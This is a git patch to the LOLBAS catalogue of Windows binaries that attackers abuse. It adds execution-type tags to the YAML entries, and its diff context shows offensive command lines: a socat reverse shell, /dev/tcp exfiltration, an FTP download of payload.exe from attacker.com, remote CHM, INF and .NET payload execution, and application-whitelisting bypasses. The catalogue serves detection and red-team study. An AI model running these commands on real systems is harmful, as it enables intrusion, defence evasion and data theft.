From b9a6cd6a87cbd8e6c29b5cef62d9a430b88979a6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 29 Dec 2024 18:31:01 +0100 Subject: [PATCH] Adding Execute tags to most LOLBas (#405) --- yml/OSBinaries/Addinutil.yml | 2 ++ yml/OSBinaries/At.yml | 2 ++ yml/OSBinaries/Atbroker.yml | 2 ++ yml/OSBinaries/Bash.yml | 8 +++++ yml/OSBinaries/Cmstp.yml | 5 +-- yml/OSBinaries/Conhost.yml | 4 +++ yml/OSBinaries/Control.yml | 9 +++++ yml/OSBinaries/CustomShellHost.yml | 2 ++ yml/OSBinaries/Dfsvc.yml | 3 ++ yml/OSBinaries/Diskshadow.yml | 4 +++ yml/OSBinaries/Dnscmd.yml | 1 + yml/OSBinaries/Esentutl.yml | 1 - yml/OSBinaries/Eventvwr.yml | 2 ++ yml/OSBinaries/Explorer.yml | 4 +++ yml/OSBinaries/Forfiles.yml | 4 +++ yml/OSBinaries/Fsutil.yml | 2 ++ yml/OSBinaries/Ftp.yml | 2 ++ yml/OSBinaries/Gpscript.yml | 4 +++ yml/OSBinaries/Hh.yml | 17 ++++++++++ yml/OSBinaries/Ie4uinit.yml | 2 ++ yml/OSBinaries/Iediagcmd.yml | 2 ++ yml/OSBinaries/Ieexec.yml | 6 ++++ yml/OSBinaries/Infdefaultinstall.yml | 2 ++ yml/OSBinaries/Installutil.yml | 8 ++--- yml/OSBinaries/Jsc.yml | 4 +-- .../Microsoft.Workflow.Compiler.yml | 7 ++++ yml/OSBinaries/Mmc.yml | 4 +++ yml/OSBinaries/Msbuild.yml | 8 ++++- yml/OSBinaries/Msconfig.yml | 2 ++ yml/OSBinaries/Msdt.yml | 3 ++ yml/OSBinaries/Msedge.yml | 2 ++ yml/OSBinaries/Mshta.yml | 9 +++-- yml/OSBinaries/Msiexec.yml | 11 +++++++ yml/OSBinaries/Pcalua.yml | 5 +++ yml/OSBinaries/Pcwrun.yml | 4 +++ yml/OSBinaries/Pnputil.yml | 2 ++ yml/OSBinaries/Presentationhost.yml | 2 ++ yml/OSBinaries/Provlaunch.yml | 2 ++ yml/OSBinaries/Regasm.yml | 8 ++--- yml/OSBinaries/Regsvcs.yml | 10 +++--- yml/OSBinaries/Regsvr32.yml | 10 ++++++ yml/OSBinaries/Rundll32.yml | 21 ++++-------- yml/OSBinaries/Runexehelper.yml | 2 ++ yml/OSBinaries/Runonce.yml | 2 ++ yml/OSBinaries/Runscripthelper.yml | 2 ++ yml/OSBinaries/Sc.yml | 4 +++ yml/OSBinaries/Schtasks.yml | 4 +++ yml/OSBinaries/Scriptrunner.yml | 5 +++ yml/OSBinaries/Setres.yml | 2 ++ yml/OSBinaries/SettingSyncHost.yml | 4 +++ yml/OSBinaries/Ssh.yml | 4 +++ yml/OSBinaries/Stordiag.yml | 4 +++ yml/OSBinaries/Syncappvpublishingserver.yml | 2 ++ yml/OSBinaries/Ttdinject.yml | 4 +++ yml/OSBinaries/Tttracer.yml | 2 ++ yml/OSBinaries/Unregmp2.yml | 2 ++ yml/OSBinaries/Vbc.yml | 4 --- yml/OSBinaries/Verclsid.yml | 2 ++ yml/OSBinaries/Wab.yml | 2 ++ yml/OSBinaries/Winget.yml | 3 ++ yml/OSBinaries/Wlrmdr.yml | 2 ++ yml/OSBinaries/Wmic.yml | 13 +++++++- yml/OSBinaries/WorkFolders.yml | 2 ++ yml/OSBinaries/Xwizard.yml | 4 +++ yml/OSBinaries/msedge_proxy.yml | 2 ++ yml/OSBinaries/msedgewebview2.yml | 8 +++++ yml/OSBinaries/wt.yml | 2 ++ yml/OSLibraries/Advpack.yml | 8 ++++- yml/OSLibraries/Desk.yml | 5 +++ yml/OSLibraries/Dfshim.yml | 3 ++ yml/OSLibraries/Ieadvpack.yml | 8 +++++ yml/OSLibraries/Ieframe.yml | 2 ++ yml/OSLibraries/Mshtml.yml | 2 ++ yml/OSLibraries/Pcwutl.yml | 2 ++ yml/OSLibraries/Setupapi.yml | 4 +-- yml/OSLibraries/Shdocvw.yml | 2 ++ yml/OSLibraries/Shell32.yml | 4 +++ yml/OSLibraries/Syssetup.yml | 4 +-- yml/OSLibraries/Url.yml | 12 +++++++ yml/OSLibraries/Zipfldr.yml | 4 +++ yml/OSScripts/CL_LoadAssembly.yml | 2 +- yml/OSScripts/CL_mutexverifiers.yml | 2 ++ yml/OSScripts/Cl_invocation.yml | 2 ++ yml/OSScripts/Launch-VsDevShell.yml | 4 +++ yml/OSScripts/Manage-bde.yml | 4 +++ yml/OSScripts/Pubprn.yml | 2 ++ yml/OSScripts/Syncappvpublishingserver.yml | 2 ++ yml/OSScripts/UtilityFunctions.yml | 2 +- yml/OSScripts/Winrm.yml | 8 +++++ yml/OSScripts/pester.yml | 11 +++---- yml/OtherMSBinaries/AccCheckConsole.yml | 4 +-- yml/OtherMSBinaries/Adplus.yml | 5 +++ yml/OtherMSBinaries/Agentexecutor.yml | 4 +++ yml/OtherMSBinaries/Appcert.yml | 4 +++ yml/OtherMSBinaries/Appvlp.yml | 6 ++++ yml/OtherMSBinaries/Bginfo.yml | 2 ++ yml/OtherMSBinaries/Cdb.yml | 6 ++++ yml/OtherMSBinaries/Coregen.yml | 2 ++ yml/OtherMSBinaries/Csi.yml | 2 ++ yml/OtherMSBinaries/DefaultPack.yml | 2 ++ yml/OtherMSBinaries/Devinit.yml | 3 ++ yml/OtherMSBinaries/Devtoolslauncher.yml | 4 +++ yml/OtherMSBinaries/Dnx.yml | 2 ++ yml/OtherMSBinaries/Dotnet.yml | 8 +++++ yml/OtherMSBinaries/Dxcap.yml | 2 ++ yml/OtherMSBinaries/Fsi.yml | 4 +++ yml/OtherMSBinaries/FsiAnyCpu.yml | 4 +++ yml/OtherMSBinaries/Mftrace.yml | 4 +++ .../Microsoft.NodejsTools.PressAnyKey.yml | 2 ++ yml/OtherMSBinaries/Msdeploy.yml | 4 +++ yml/OtherMSBinaries/Msxsl.yml | 10 ++++++ yml/OtherMSBinaries/OpenConsole.yml | 2 ++ yml/OtherMSBinaries/Rcsi.yml | 4 +++ yml/OtherMSBinaries/Remote.yml | 7 ++++ yml/OtherMSBinaries/Sqlps.yml | 2 ++ yml/OtherMSBinaries/Sqltoolsps.yml | 2 ++ yml/OtherMSBinaries/Squirrel.yml | 12 +++++++ yml/OtherMSBinaries/Te.yml | 2 ++ yml/OtherMSBinaries/Teams.yml | 6 ++++ yml/OtherMSBinaries/Update.yml | 33 +++++++++++++++++++ yml/OtherMSBinaries/VSDiagnostics.yml | 4 +++ yml/OtherMSBinaries/VSIISExeLauncher.yml | 2 ++ yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 2 ++ yml/OtherMSBinaries/VsLaunchBrowser.yml | 5 +++ yml/OtherMSBinaries/Vshadow.yml | 2 ++ yml/OtherMSBinaries/Vsjitdebugger.yml | 2 ++ yml/OtherMSBinaries/Wfc.yml | 2 ++ yml/OtherMSBinaries/Wsl.yml | 6 ++++ yml/OtherMSBinaries/winfile.yml | 2 ++ 129 files changed, 520 insertions(+), 59 deletions(-) diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 909f7aa57..255647650 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: .NetObjects Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index eb9743cc3..80c5faaf5 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -11,6 +11,8 @@ Commands: Privileges: Local Admin MitreID: T1053.002 OperatingSystem: Windows 7 or older + Tags: + - Execute: CMD Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index dff336889..d8f50647b 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index d257f752d..ec33fe020 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 903ec7375..5bd76aacb 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. @@ -21,7 +21,8 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Input: INF + - Execute: INF + - Execute: Remote Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 2ee2b75c8..cd076da41 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\conhost.exe Detection: diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 7f4e162a8..a4864587e 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -13,6 +13,15 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Command: control.exe c:\windows\tasks\evil.cpl + Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) + Usecase: Use to execute code and bypass application whitelisting + Category: Execute + Privileges: User + MitreID: T1218.002 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 69d11cbf5..7390b3568 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\CustomShellHost.exe Detection: diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 2a1cb9d1f..ab8ca266f 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: ClickOnce + - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index 7fb9a184d..c54501fad 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1003.003 OperatingSystem: Windows server + Tags: + - Execute: CMD - Command: diskshadow> exec calc.exe Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows server + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 27f0d0159..613ce7619 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows server Tags: - Execute: DLL + - Execute: Remote Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index e3328c1ff..378d7c287 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -46,7 +46,6 @@ Commands: Privileges: Admin MitreID: T1003.003 OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server - Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index e0a46a32e..d8beeeaed 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: EXE - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. @@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: .NetObjects Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 829f2f895..1c0e2ff30 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 51a084c39..a23687212 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index 63ef85914..e4b38ed1d 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 62b9a828b..6b4828bf8 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index fba5f6fe0..3ac6adcbb 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index f6db4701e..27af482fc 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Application: GUI - Command: HH.exe c:\windows\system32\calc.exe Description: Executes calc.exe with HTML Help. Usecase: Execute process with HH.exe @@ -18,6 +21,20 @@ Commands: Privileges: User MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Application: GUI + - Command: HH.exe http://some.url/payload.chm + Description: Executes a remote payload.chm file which can contain commands. + Usecase: Execute commands with HH.exe + Category: Execute + Privileges: User + MitreID: T1218.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: CHM + - Execute: Remote Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index 461fbca21..80c6cc52d 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: INF Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index b1d47d4b4..056e30eee 100644 --- a/yml/OSBinaries/Iediagcmd.yml +++ b/yml/OSBinaries/Iediagcmd.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 0987d2b19..f397b3703 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Remote + - Execute: EXE (.NET) - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Remote + - Execute: EXE (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 4c8668811..d0f129a86 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -11,6 +11,8 @@ Commands: Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: INF Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 40d9a442a..c9f29fe2a 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting @@ -22,8 +22,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index b4e719837..3a5f5a603 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript - Command: jsc.exe /t:library Library.js Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index c26c0c2eb..cd128954d 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: VB.Net + - Execute: Csharp - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -18,6 +21,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: XOML - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -25,6 +30,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: XOML Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 7dfdb8d8c..dab5e4996 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 + Tags: + - Execute: COM - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 62d95ffe9..04ff916b6 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CSharp - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CSharp - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -35,7 +39,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: XSL - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections @@ -43,6 +47,8 @@ Commands: Privileges: User MitreID: T1036 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 56b2a4fa0..f8c829ef1 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\msconfig.exe Code_Sample: diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index ed0a6019e..e6811049e 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, 